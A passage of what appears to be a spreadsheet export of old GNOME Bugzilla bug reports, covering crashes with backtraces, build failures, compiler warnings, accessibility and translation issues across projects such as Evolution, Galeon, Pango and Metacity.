write(5 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0\0\0\000... 1416) =
 1416
close(5)                                = 0
open(/var/cache/redcarpet/packages/rc-rpm-helper-with-rpmio.so O_WRONLY|O_CRE
AT|O_TRUNC 0600) = 5
write(5 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0\0\0\000... 1436) =
 1436
close(5)                                = 0
--- SIGSEGV (Segmentation fault) ---
write(4 \223\2\2\0\4\0\340\2\33\0\2\0\0\0\0\0 \0\2\0\0\0\0\0+\0... 28) = 28
read(4 0xbffff424 32)                 = -1 EAGAIN (Resource temporarily unavai
lable)
select(5 [4] NULL NULL NULL)        = 1 (in [4])
Debugging Information:
(no debugging symbols found)...
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-05-03 05:57 -------
The original reporter (petr@diderot-it.cz) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component baulig@suse.de.
</t>
  </si>
  <si>
    <t>GIMP-126366</t>
  </si>
  <si>
    <t>bmp - wrong colors loaded</t>
  </si>
  <si>
    <t>Wallpapers from this side  http://www.thetick.ws/wallpaper.html - bmp
format - are wird loaded in gimp... looks like overloaded color table.
In other programs this images are normal loaded...</t>
  </si>
  <si>
    <t>kameameaa</t>
  </si>
  <si>
    <t>EVOLUTION-226195</t>
  </si>
  <si>
    <t>Problem with Full Names with apostrophe</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.5
Synopsis: Problem with Full Names with asterisks
Bugzilla-Product: Evolution
Bugzilla-Component: Miscellaneous
Description:
Given a name in an addressbook which has an apostrophy (like my name
for example) strange double-quotes appear.
Given that my name appears in either an address-book entry or in the
Full Name field of an account's information like A the corresponding
lines in the email header of a message sent with evolution will appear
as B and will display in the message as C
A:	Christopher (siege) O'Brien
B:	\Christopher (siege) \O'Brien
C:	Christopher (siege) O'Brien
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>siege</t>
  </si>
  <si>
    <t>PANGO-466755</t>
  </si>
  <si>
    <t>hangul</t>
  </si>
  <si>
    <t>pango hangul is crashing in gnome-about because it is failing to retrieve a font.</t>
  </si>
  <si>
    <t>This pango bug was noticed in gnome-about-me
Gnome-about crashes. This bug can be found if you run gnome-about manually.
In this file there is one name(which may be encoded incorrect) cause the problem in FcFreeTypeCharIndex.  in hangul module the case of NULL face haven't been considered.
I just ran gnome-about from the commandline and waited about 1 minute.
I got the following output :
(gnome-about:2344): Pango-WARNING **: shape engine failure expect ugly output. the offending font is 'LucidaSansLat5 Bold Not-Rotated 0'
Looks like pango is failing to retrieve the font when one of the contributor's name
is displayed.
Additional info:
Trace:
869:    /usr/lib/gnome-about
 ff3450b4 waitid   (0 491 ffbfd930 3)
 fed63314 libgnomeui_segv_handle (b 0 1 feda9a64 46838 fedae22c) + ec
 ff343ccc __sighndlr (b 0 ffbfdbd0 fed63228 0 0) + c
 ff3385dc call_user_handler (b 0 ffbfdbd0 fd38b1c0 47f08 ff380658) + 41c
 fab98e64 FT_Get_Char_Index (fd38b198 30 1 fd33c428 2af7b8 fd38b118) + 18
 fd32af24 _cairo_scaled_font_text_to_glyphs (fd38b198 0 1 ffbfdff0 3 ffbfdf70) + 124
 fd32ab10 cairo_scaled_font_text_extents (fd38b198 ffbfe4ae ffbfe408 ffbfdff4 facf8570 ffbfdff0) + 28
 face4160 _pango_cairo_font_get_hex_box_info (fd38b198 4b0a20 0 1 facf8570 4c4860) + 4e0
 face4530 _pango_cairo_get_glyph_extents_missing (4b0a20 10000043 0 ffbfe570 face764c 14054) + 18
 fad5af80 fallback_engine_shape (4c1d30 4abaf0 feeba708 4c 23bbc4 10000043) + 94
 fad6ec00 pango_shape (4abaf0 10 23bbc4 4c1d30 0 22ec0) + 1f4
 fad618b4 shape_run (4c3290 ffbfe778 23bbb8 4c1d30 feeb8684 234af8) + 6c
 fad61a14 process_item (234af8 4c3290 ffbfe778 1 0 10000000) + 44
 fad6213c process_line (234af8 ffbfe778 ffffffff 23bbb8 fad918d0 4c3290) + 114
 fad62a38 pango_layout_check_lines (ffbfe778 4abaf0 234af8 0 10 4abb00) + 3b8
 fad60aac pango_layout_get_extents_internal (0 0 ffbfe920 0 234af8 0) + 13c
 fad6106c pango_layout_get_pixel_extents (234af8 0 ffbfe920 20 308dc 0) + 7c
 fad610cc pango_layout_get_pixel_size (234af8 2102c8 2102cc 18 feeb8684 49c040) + c
 fa9baa0c gnome_canvas_text_set_property (578 14 ffbfebe8 34 80 fa9b9e80) + af0
 febe4008 g_object_set_valist (2101d0 ffbfec08 ffbfed7c 1400 4b11d0 47598) + 624
 fa9c3654 gnome_canvas_item_set_valist (2101d0 1824c ffbfed64 0 1a024 8fc80) + 84
 fa9c35c0 gnome_canvas_item_set (2101d0 1824c 4abb10 18214 ffffffff 18224) + 1c
 00013264 display_contributors (29800 2 e0 29800 4abb10 29950) + 22c
 00012f4c animate_contributor (1f3590 f300 f30000 f3000000 f3 12ca0) + 28c
 fee40f8c g_timeout_dispatch (239448 12cc0 1f3590 ff3a2000 1 0) + 4c
 fee3d634 g_main_dispatch (4cb80 1 0 feeba408 feeb8684 4cb88) + 1e4
 fee3ec80 g_main_context_dispatch (1 1 feeba3f4 2 feeba3f8 4cb80) + c8
 fee3f1a0 g_main_context_iterate (1 1 1 4cb80 8 8) + 49c
 fee3faa4 g_main_loop_run (21e640 0 0 2b690 21e648 1) + 3e4
 fe98ea28 gtk_main (0 0 0 b498 febc5974 21e640) + d8
 00015718 main     (1 ffbff2f4 18400 18400 33c58 67800) + 114
 00012860 _start   (0 0 0 0 0 0) + 108</t>
  </si>
  <si>
    <t>GTKGLEXT-133952</t>
  </si>
  <si>
    <t>GTKGLEXT</t>
  </si>
  <si>
    <t>gl widget is destroyed at end of recursive mainloop</t>
  </si>
  <si>
    <t>In some cases creating and ending a recursive mainloop (via a dialog for
example) will result in the gl widget being explicitly destroyed.  This is
caused by a line in gtkglwidget.c at the end of gtk_widget_get_gl_context()
where it calls gtk_quit_add_destroy().  I can't see that calling
gtk_quit_add_destroy() is a good idea in any case as programs should be
free to enter leave and re-enter the gtk mainloop whenever they want.</t>
  </si>
  <si>
    <t>naofumi</t>
  </si>
  <si>
    <t>GDM-85938</t>
  </si>
  <si>
    <t>gdm keeps killing it self</t>
  </si>
  <si>
    <t>Whenever i boot up my computer and it gets to the login stage my screen 
blinks a few times and the command prompt comes up and says gdm.init 
reports that gdm is running but it seems to have been mysteriously 
murdered. Then after about 2 seconds it does it again. How do i fix this?</t>
  </si>
  <si>
    <t>ypmaster649</t>
  </si>
  <si>
    <t>GNOPERNICUS-145216</t>
  </si>
  <si>
    <t>Layer 03 w/10â€“ Find Next (navigation layer) inconsistant or no output</t>
  </si>
  <si>
    <t>Environment:
  Gnome 2.6.2 build date 06/23/04
  Gnopernicus 0.8.4
Steps to recreate reported problem.
1. Start Gnopernicus with speech perference turned on.
2. Turn on keypad layer by pressing numlock key.
3. Open the run application
4. Move mouse point into the run application window.
5. Press to layer 03 with option 10 del key (which is find next).
6. Output states layer 3 and that's all you get folks. Note: after a few 
presses of 03 del key over and over again you might get the speech output that 
you are required to get. Sometime you might not even get the output of layer 
3.</t>
  </si>
  <si>
    <t>mp</t>
  </si>
  <si>
    <t>deangelo</t>
  </si>
  <si>
    <t>GTK-DOC-132661</t>
  </si>
  <si>
    <t>gtk-doc changes breaks HEAD librgvs(possibly others)</t>
  </si>
  <si>
    <t>with recent changes to gtk-doc in CVS HEAD my build of librvgs is
breaking. If I add '--disable-gtk-doc' to it's configure command it builds
fine.
*** Building SGML ***
cd . &amp;&amp; \
gtkdoc-mkdb --module=rsvg --source-dir=.. --sgml-mode
100% symbol docs coverage (23 symbols documented 0 not documented)
See rsvg-undocumented.txt for a list of missing docs.
The doc coverage percentage doesn't include intro sections.
touch sgml-build.stamp
*** Building HTML ***
rm -rf ./html
mkdir ./html
cd ./html &amp;&amp; gtkdoc-mkhtml rsvg ../rsvg-docs.sgml
/usr/bin/jade:../sgml/object_index.sgml:7:7:E: end tag for TBODY which is
not finished
make[2]: *** [html-build.stamp] Error 1
make[2]: Leaving directory `/gnome/2.4/nightly/src-2.5-20040127/librsvg/doc'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/gnome/2.4/nightly/src-2.5-20040127/librsvg'
make: *** [all-recursive-am] Error 2
make  all-recursive
make[1]: Entering directory `/gnome/2.4/nightly/src-2.5-20040127/librsvg'
Making all in .
make[2]: Entering directory `/gnome/2.4/nightly/src-2.5-20040127/librsvg'
make[2]: Nothing to be done for `all-am'.
make[2]: Leaving directory `/gnome/2.4/nightly/src-2.5-20040127/librsvg'
Making all in gtk-engine
make[2]: Entering directory
`/gnome/2.4/nightly/src-2.5-20040127/librsvg/gtk-engine'
make[3]: Entering directory
`/gnome/2.4/nightly/src-2.5-20040127/librsvg/gtk-engine'
make[3]: Nothing to be done for `all-am'.
make[3]: Leaving directory
`/gnome/2.4/nightly/src-2.5-20040127/librsvg/gtk-engine'
make[2]: Leaving directory
`/gnome/2.4/nightly/src-2.5-20040127/librsvg/gtk-engine'
Making all in gdk-pixbuf-loader
make[2]: Entering directory
`/gnome/2.4/nightly/src-2.5-20040127/librsvg/gdk-pixbuf-loader'
make[2]: Nothing to be done for `all'.
make[2]: Leaving directory
`/gnome/2.4/nightly/src-2.5-20040127/librsvg/gdk-pixbuf-loader'
Making all in doc
make[2]: Entering directory `/gnome/2.4/nightly/src-2.5-20040127/librsvg/doc'
*** Building HTML ***
rm -rf ./html
mkdir ./html
cd ./html &amp;&amp; gtkdoc-mkhtml rsvg ../rsvg-docs.sgml
/usr/bin/jade:../sgml/object_index.sgml:7:7:E: end tag for TBODY which is
not finished
make[2]: *** [html-build.stamp] Error 1
make[2]: Leaving directory `/gnome/2.4/nightly/src-2.5-20040127/librsvg/doc'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/gnome/2.4/nightly/src-2.5-20040127/librsvg'
make: *** [all-recursive-am] Error 2
---&gt;8--- output of make command ends ------</t>
  </si>
  <si>
    <t>LIBGEE-589690</t>
  </si>
  <si>
    <t>LIBGEE</t>
  </si>
  <si>
    <t>[libgee] Collection interface methods add_all contains_all remove_all and retain_all</t>
  </si>
  <si>
    <t>Extend collection interface with methods 
 - add_all - adds a input collection to the current collection
 - contains_all - true if current collection contains all items from the input collection
 - remove_all - removes all items in current collection that are in input collection
 - retain_all - removes all items in current collection that are not in input collection
Additionally empty property which is true if collection is empty.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-144329</t>
  </si>
  <si>
    <t>Mouse</t>
  </si>
  <si>
    <t>Data reported for slider change not very helpful</t>
  </si>
  <si>
    <t>-&gt; Next open Mouse Capplet
-&gt; Go to the sliding bar for adjusting timeout
-&gt; Start moving the sliding bar
Observation &amp; Bug - The sliding bar is for adjusting the timeout in 0.x
seconds. As the sliding bar is modified visually the data is visible in
a label following the sliding bar which shows 0.5 seconds 0.3
seconds and so on.
Now there are two issues here -
1. This label is not read at all.
2. The sliding bar movement causes the speech reader to read out
information as follows 500 300 and so on. Without any units. It is
perplexing.
Expected - read the units. And read out the modified data correctly in
sync with the units as 0.5 seconds 0.3 seconds and so on.
300 milliseconds and so on is complex and not desirable.</t>
  </si>
  <si>
    <t>GTK+-141080</t>
  </si>
  <si>
    <t>Patch to remove multiple warnings in gdk/x11/gdkdnd-x11.c</t>
  </si>
  <si>
    <t>This is a tricky one. I was getting the following warnings:
gdkdnd-x11.c: In function `motif_read_target_table':
gdkdnd-x11.c:920: warning: dereferencing type-punned pointer will break
strict-aliasing rules
gdkdnd-x11.c: In function `motif_check_dest':
gdkdnd-x11.c:1270: warning: dereferencing type-punned pointer will break
strict-aliasing rules
gdkdnd-x11.c: In function `motif_read_initiator_info':
gdkdnd-x11.c:1464: warning: dereferencing type-punned pointer will break
strict-aliasing rules
gdkdnd-x11.c: In function `xdnd_check_dest':
gdkdnd-x11.c:2384: warning: dereferencing type-punned pointer will break
strict-aliasing rules
gdkdnd-x11.c:2404: warning: dereferencing type-punned pointer will break
strict-aliasing rules
gdkdnd-x11.c: In function `xdnd_read_actions':
gdkdnd-x11.c:2451: warning: dereferencing type-punned pointer will break
strict-aliasing rules
gdkdnd-x11.c: In function `xdnd_enter_filter':
What I've found is the following:
      MotifTargetTableHeader *header = NULL
      .
      .
      .
      XGetWindowProperty (display_x11-&gt;xdisplay
                          display_x11-&gt;motif_drag_window
                          motif_drag_targets_atom
                          0 (sizeof(MotifTargetTableHeader)+3)/4 FALSE
                          motif_drag_targets_atom
                          &amp;type &amp;format &amp;nitems &amp;bytes_after
                          (guchar **)
is breaks gcc's C99 strict aliasing rules. To get around this you need to
convert a guchar** to a MotifTargetTableHeader*. The only way I can see that is
valid is to create a guchar** use this in parameter 12 of XGetWindowProperty
cast this to a temporary gpointer and then cast the temporary gpointer to an
XGetWindowProperty* variable. 
So the previous fragment will look like:
      MotifTargetTableHeader *header = NULL
      .
      .
      .
      guchar **pheader
      gpointer temp_header
                                                                   .
      .
      .
      XGetWindowProperty (display_x11-&gt;xdisplay
                          display_x11-&gt;motif_drag_window
                          motif_drag_targets_atom
                          0 (sizeof(MotifTargetTableHeader)+3)/4 FALSE
                          motif_drag_targets_atom
                          &amp;type &amp;format &amp;nitems &amp;bytes_after
                          pheader)
      temp_header = (gpointer) 
      header = (MotifTargetTableHeader*) 
Very much a hack job I feel (in fact I say as much in a comment in the diff).
However it does remove the strict-aliasing warnings in gcc.</t>
  </si>
  <si>
    <t>METACITY-354211</t>
  </si>
  <si>
    <t>build fails when XKB not found</t>
  </si>
  <si>
    <t>I'm not at a good place to fix this at the moment so I'm filing so I don't forget.  I got an email saying:
Building GNOME with garnome-2.15.92
desktop/metacity-$version goes through configure.
src/display.c gives me the error last_bell_time missing in MetaDisplay.
To which I responded:
It means you don't have the XKB extension.  Metacity is supposed to
work even without the XKB extension so this is a bug in Metacity.
Just change the line
   display-&gt;last_bell_time = 0
in src/display.c:meta_display_open() to
 #ifdef HAVE_XKB
   display-&gt;last_bell_time = 0
 #endif
and then it should compile.
Thanks for pointing this out to me.</t>
  </si>
  <si>
    <t>GALEON-58859</t>
  </si>
  <si>
    <t>galeon crashed when saving image</t>
  </si>
  <si>
    <t xml:space="preserve">Package: galeon
Severity: normal
Version: 0.12pre1
Synopsis: galeon crashed when saving image
Bugzilla-Product: galeon
Bugzilla-Component: general
Description:
I had a window open with an image in it then I opened a window which was loading a Java applet.  I closed the window with the applet still loading and things seemed OK.  When I selected File-&gt;Save Image galeon crashed.
Debugging Information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...[New Thread 1024 (runnable)]
[New Thread 2049 (runnable)]
[New Thread 1026 (runnable)]
[New Thread 2051 (runnable)]
0x407df8c9 in __wait4 () from /lib/libc.so.6
#0  0x407df8c9 in __wait4 () from /lib/libc.so.6
#1  0x4083e1cc in __DTOR_END__ () from /lib/libc.so.6
#2  0x405fe975 in waitpid (pid=16328 stat_loc=0xbfffe320 options=0)
    at wrapsyscall.c:134
#3  0x401a17ff in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x405fd532 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 16 
      esi = 3221219012 ebp = 3221218988 esp = 3221218972 ebx = 1079048844 
      edx = 130 ecx = 4294967295 eax = 0 trapno = 14 err = 4 
      eip = 1079014984 cs = 35 __csh = 0 eflags = 66118 
      esp_at_signal = 3221218972 ss = 43 __ssh = 0 fpstate = 0xbfffe420 
      oldmask = 2147483648 cr2 = 16}) at signals.c:96
#5  
#6  0x40507648 in g_strconcat (string1=0x85ca720 /home/dmeyer)
    at gstrfuncs.c:193
#7  0x80749f3 in embed_save_document ()
#8  0x80747f9 in embed_save_image ()
#9  0x807bc4b in autobookmarks_notifier ()
#10 0x807bd85 in context_show_menu ()
#11 0x808d238 in mozembed_dom_mouse_down_cb ()
#12 0x402e2921 in gtk_marshal_BOOL__POINTER (object=0x871d5f8 
    func=0x808d13c  func_data=0x8500a80 
    args=0xbfffe828) at gtkmarshal.c:28
#13 0x4030f4d7 in gtk_handlers_run (handlers=0x8752d80 signal=0xbfffe7e4 
    object=0x871d5f8 params=0xbfffe828 after=0) at gtksignal.c:1917
#14 0x4030e9af in gtk_signal_real_emit (object=0x871d5f8 signal_id=148 
    params=0xbfffe828) at gtksignal.c:1477
#15 0x4030cc40 in gtk_signal_emit (object=0x871d5f8 signal_id=148)
    at gtksignal.c:552
#16 0x4002c3e8 in EmbedEventListener::MouseDown ()
   from /usr/lib/libgtkembedmoz.so
#17 0x40c64d39 in NSGetModule ()
   from /usr/local/mozilla/components/libgkcontent.so
#18 0x410348e9 in NSGetModule () from /usr/local/mozilla/components/libjsdom.so
#19 0x4101f26c in NSGetModule () from /usr/local/mozilla/components/libjsdom.so
#20 0x40dada65 in NSGetModule ()
   from /usr/local/mozilla/components/libgkcontent.so
#21 0x40dc91d3 in NSGetModule ()
   from /usr/local/mozilla/components/libgkcontent.so
#22 0x40dc91d3 in NSGetModule ()
   from /usr/local/mozilla/components/libgkcontent.so
#23 0x40dc91d3 in NSGetModule ()
   from /usr/local/mozilla/components/libgkcontent.so
#24 0x40dc91d3 in NSGetModule ()
   from /usr/local/mozilla/components/libgkcontent.so
#25 0x40c9c730 in NSGetModule ()
   from /usr/local/mozilla/components/libgkcontent.so
#26 0x412d096d in NSGetModule ()
   from /usr/local/mozilla/components/libgklayout.so
#27 0x412d07ad in NSGetModule ()
   from /usr/local/mozilla/components/libgklayout.so
#28 0x4140b866 in NSGetModule ()
   from /usr/local/mozilla/components/libgkview.so
#29 0x4140b80e in NSGetModule ()
   from /usr/local/mozilla/components/libgkview.so
#30 0x4140b80e in NSGetModule ()
   from /usr/local/mozilla/components/libgkview.so
#31 0x41414fde in NSGetModule ()
   from /usr/local/mozilla/components/libgkview.so
#32 0x4140b20d in NSGetModule ()
   from /usr/local/mozilla/components/libgkview.so
#33 0x40f034da in NSGetModule ()
   from /usr/local/mozilla/components/libwidget_gtk.so
#34 0x40f03405 in NSGetModule ()
   from /usr/local/mozilla/components/libwidget_gtk.so
#35 0x40f03557 in NSGetModule ()
   from /usr/local/mozilla/components/libwidget_gtk.so
#36 0x40f0408f in NSGetModule ()
   from /usr/local/mozilla/components/libwidget_gtk.so
#37 0x40f076af in NSGetModule ()
   from /usr/local/mozilla/components/libwidget_gtk.so
#38 0x40efe217 in NSGetModule ()
   from /usr/local/mozilla/components/libwidget_gtk.so
#39 0x40efdf64 in NSGetModule ()
   from /usr/local/mozilla/components/libwidget_gtk.so
#40 0x40395392 in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff698 user_data=0x0) at gdkevents.c:2139
#41 0x404fe9f6 in g_main_dispatch (dispatch_time=0xbffff698) at gmain.c:656
#42 0x404fefb1 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#43 0x404ff129 in g_main_run (loop=0x8417d58) at gmain.c:935
#44 0x402e148a in gtk_main () at gtkmain.c:524
#45 0x8086f75 in main ()
#46 0x407669cb in __libc_start_main (main=0x8086d40  argc=1 
    argv=0xbffff754 init=0x8063708  fini=0x80a8f4c  
    rtld_fini=0x4000aea0  stack_end=0xbffff74c)
    at ../sysdeps/generic/libc-start.c:92
#0  0x407df8c9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x4083e1cc in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x405fe975 in waitpid (pid=16328 stat_loc=0xbfffe320 options=0)
    at wrapsyscall.c:134
stat_loc = (int *) 0xbfffe320
options = 0
result = 0
oldtype = 0
#3  0x401a17ff in gnome_segv_handle (signum=11) at gnome-init.c:659
estatus = 0
in_segv = 1
pid = 0
#4  0x405fd532 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 16 
      esi = 3221219012 ebp = 3221218988 esp = 3221218972 ebx = 1079048844 
      edx = 130 ecx = 4294967295 eax = 0 trapno = 14 err = 4 
      eip = 1079014984 cs = 35 __csh = 0 eflags = 66118 
      esp_at_signal = 3221218972 ss = 43 __ssh = 0 fpstate = 0xbfffe420 
      oldmask = 2147483648 cr2 = 16}) at signals.c:96
self = 0x40604920
in_sighandler = 0x0
#5  
No locals.
#6  0x40507648 in g_strconcat (string1=0x85ca720 /home/dmeyer)
    at gstrfuncs.c:193
l = 0
args = 0xbfffe6c4
s = (gchar *) 0x10 
concat = (gchar *) 0x88071a8 
#7  0x80749f3 in embed_save_document ()
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-08-11 15:22 -------
The original reporter (dmeyer@dmeyer.net) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component yaneti@declera.com.
</t>
  </si>
  <si>
    <t>dmeyer</t>
  </si>
  <si>
    <t>EVOLUTION-210334</t>
  </si>
  <si>
    <t>evolution re-asks for password on tcp errors</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Major
Version: cvs.2001.09.18.07.08
Synopsis: evolution forgets password on tcp error
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
I got a tcp error or temporary error from the mail server on pop3. 
Evolution asked for a new password I hit cancel.  Unfortunately I have
forgotten my password and the answer to the question that will reset
it.
This is bogus though on cancel evolution should remember the old
password just as netscape and mozilla do.
</t>
  </si>
  <si>
    <t>trever</t>
  </si>
  <si>
    <t>GNOME-VFS-333582</t>
  </si>
  <si>
    <t>Monitoring remote mounts with fam when inotify is enabled</t>
  </si>
  <si>
    <t>When inotify support is enabled it always gets used if it's found in the kernel. However it won't work on remote filesystems. As such monitoring for NFS filesystems should still be done with FAM. Patch follows.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-66341</t>
  </si>
  <si>
    <t>SlashApp crashes</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-applets
Severity: normal
Version: 1.4.0.1
Synopsis: SlashApp crashes
Bugzilla-Product: gnome-applets
Bugzilla-Component: slashapp
Description:
SlashApp crashes when I right-click it and use the Show Articles option.
It always happens at least to me some time ago it didn't happen when it was just restarted whithin the first 10 seconds of use but now even then it happens.
I have it configured to get the SlashDot's headers all the other configuration is the deafult one
Debugging Information:
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...0x40600689 in __wait4 () from /lib/libc.so.6
#0  0x40600689 in __wait4 () from /lib/libc.so.6
#1  0x40669a58 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4014a366 in gnome_segv_handle () at eval.c:88
#3  
#4  0x4027e557 in gtk_label_new () at eval.c:88
#5  0x804bb69 in populate_article_window () at eval.c:88
#6  0x804b9b4 in show_article_window () at eval.c:88
#7  0x4007246f in server_applet_do_callback () at eval.c:88
#8  0x40079170 in _ORBIT_skel_GNOME_Applet_do_callback () at eval.c:88
#9  0x400b8995 in ORBit_POA_handle_request () at eval.c:88
#10 0x400bada2 in CORBA_ORB_run () at eval.c:88
#11 0x400baff1 in CORBA_ORB_run () at eval.c:88
#12 0x400d2224 in giop_main_handle_connection () at eval.c:88
#13 0x400863d0 in orb_handle_connection () at eval.c:88
#14 0x404bdc40 in g_io_add_watch () at eval.c:88
#15 0x404bf308 in g_get_current_time () at eval.c:88
#16 0x404bf913 in g_get_current_time () at eval.c:88
#17 0x404bfaac in g_main_run () at eval.c:88
#18 0x402897e7 in gtk_main () at eval.c:88
#19 0x400721d0 in applet_widget_gtk_main () at eval.c:88
#20 0x804b125 in main () at eval.c:88
#21 0x4057b2eb in __libc_start_main (main=0x804b0a0  argc=5 ubp_av=0xbffffa44 init=0x804a6d0  
    fini=0x804f1dc  rtld_fini=0x4000c130  stack_end=0xbffffa3c) at ../sysdeps/generic/libc-start.c:129
#0  0x40600689 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40669a58 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4014a366 in gnome_segv_handle () at eval.c:88
No locals.
#3  
No locals.
#4  0x4027e557 in gtk_label_new () at eval.c:88
88	in eval.c
No locals.
#5  0x804bb69 in populate_article_window () at eval.c:88
88	in eval.c
No locals.
#6  0x804b9b4 in show_article_window () at eval.c:88
88	in eval.c
No locals.
#7  0x4007246f in server_applet_do_callback () at eval.c:88
88	in eval.c
No locals.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-12-06 05:53 -------
The original reporter (a10@a10.guardian-elf.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-applets-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>a10</t>
  </si>
  <si>
    <t>RHYTHMBOX-119460</t>
  </si>
  <si>
    <t>rhythmbox recalculates the status display far too often</t>
  </si>
  <si>
    <t>We need to have the library iradio and group sources cache their status
information watch for node additions or removals and only recalculate it
if we need to.</t>
  </si>
  <si>
    <t>GNOME-PANEL-72201</t>
  </si>
  <si>
    <t>usability problems of clock properties</t>
  </si>
  <si>
    <t>Clock applet is the only dialog in gnome-panel which uses old
gnome-propertybox and has apply buttons. It looks really ugly.
1) Settings must be instant-apply all buttons replaced by just Close button.
2) UNIX time internet time normal time should be a group of radio buttons
GMT and 12/24 format should be in a frame Time format and disabled in
internet time case (UNIX time is always in GMT or no?). Show seconds option
also should be added.
Alternatively to
[ ] Show seconds
Time format:
( ) 12 hour
(*) 24 hour
it could be displayed as in current menu-panel clock i.e.
Time format:
( ) 3:00 AM
( ) 3:00:00 AM
(*) 15:00
( ) 15:00:00
3) Show date in tooltip option should be remuved and date just always
displayed.</t>
  </si>
  <si>
    <t>LIBGTCPSOCKET-111011</t>
  </si>
  <si>
    <t>LIBGTCPSOCKET</t>
  </si>
  <si>
    <t>to proxy verb usage difficult for translation</t>
  </si>
  <si>
    <t>In libgtcpsocket many messages use proxy not as a noun but as a verb.
The verb usage of proxy and the different tenses can be extremely
difficult to translate into other languages.
I believe the use of proxy as a verb can be replaced by other more
common verbs in conjunction with the proxy server noun.
Examples of messages using proxy as a verb:
#: data/libgtcpsocket.schemas.in.h:8
msgid The machine name to proxy encrypted connections through.
#: data/libgtcpsocket.schemas.in.h:9
msgid The machine name to proxy ftp through.
#: data/libgtcpsocket.schemas.in.h:10
msgid The machine name to proxy http through.
#: data/libgtcpsocket.schemas.in.h:11
msgid 
The port on the machine defined by /system/http_proxy/host that you proxy 
through
#: data/libgtcpsocket.schemas.in.h:12
msgid 
The port on the machine defined by /system/proxy/ftp/host that you proxy 
through
#: data/libgtcpsocket.schemas.in.h:13
msgid 
The port on the machine defined by /system/proxy/socks/host that you proxy 
through
#: data/libgtcpsocket.schemas.in.h:14
msgid 
The port on the machine defined by /system/proxy/ssl/host that you proxy 
through
#: data/libgtcpsocket.schemas.in.h:15
msgid Use SOCKS5 proxy
#: data/libgtcpsocket.schemas.in.h:16
msgid Use proxy settings when accessing http
#: data/libgtcpsocket.schemas.in.h:17
msgid User name to pass as authentication when doing http proxying
#: data/libgtcpsocket.schemas.in.h:4
msgid Password to pass as authentication when doing http proxying</t>
  </si>
  <si>
    <t>GNOME-APPLETS-162737</t>
  </si>
  <si>
    <t>Incorrect Locations</t>
  </si>
  <si>
    <t>Some locations have errors</t>
  </si>
  <si>
    <t>serrador</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-347262</t>
  </si>
  <si>
    <t>Warnings when compiling gnome-games</t>
  </si>
  <si>
    <t>The following warnings are shown when compiling gnome-games 2.15.4:
games-files.c: In function 'games_file_list_find':
games-files.c:347: warning: assignment from incompatible pointer type
games-preimage.c: In function 'games_preimage_new_from_file':
games-preimage.c:189: warning: dereferencing type-punned pointer will break strict-aliasing rules
sol.c: In function â€˜game_file_to_nameâ€™:
sol.c:102: warning: value computed is not used</t>
  </si>
  <si>
    <t>andrearo</t>
  </si>
  <si>
    <t>GNOME-THEMES-143046</t>
  </si>
  <si>
    <t>theme-highcontrast</t>
  </si>
  <si>
    <t>no Low Contrast icons for a11y themeing (Screen Reader &amp; Magnifier)</t>
  </si>
  <si>
    <t>Using Gnome built with gnome-panel 2.6.1 source tarball
- Change the theme to High Contrast Large Print Inverse
- Open main menu and go to Applications-&gt; Accessories -&gt; Accessibility
 Notice that the Screen Reader &amp; Magnifier icon does not change to suit this
accessible
theme.
It should have the following versions:
  High Contrast
  High Contrast Inverse
  Low Contrast
  Low Contrast Inverse</t>
  </si>
  <si>
    <t>BUG-BUDDY-374328</t>
  </si>
  <si>
    <t>Cannot submit data</t>
  </si>
  <si>
    <t>Please describe the problem:
When sending a bug report it says: Network Connection Error
Maybe no Network Connection available.
Do you want to store this report until a Network Connection is available?
A network connection *is* available. I have to connect through a proxy but it's all configured in the GNOME 'Network Proxy Preferences' application.
Steps to reproduce:
1. Cause an application to crash on a computer that is connected to the Internet but requires the use of a web proxy.
2. Enter bug crash details.
3. Click on 'Send'.
Actual results:
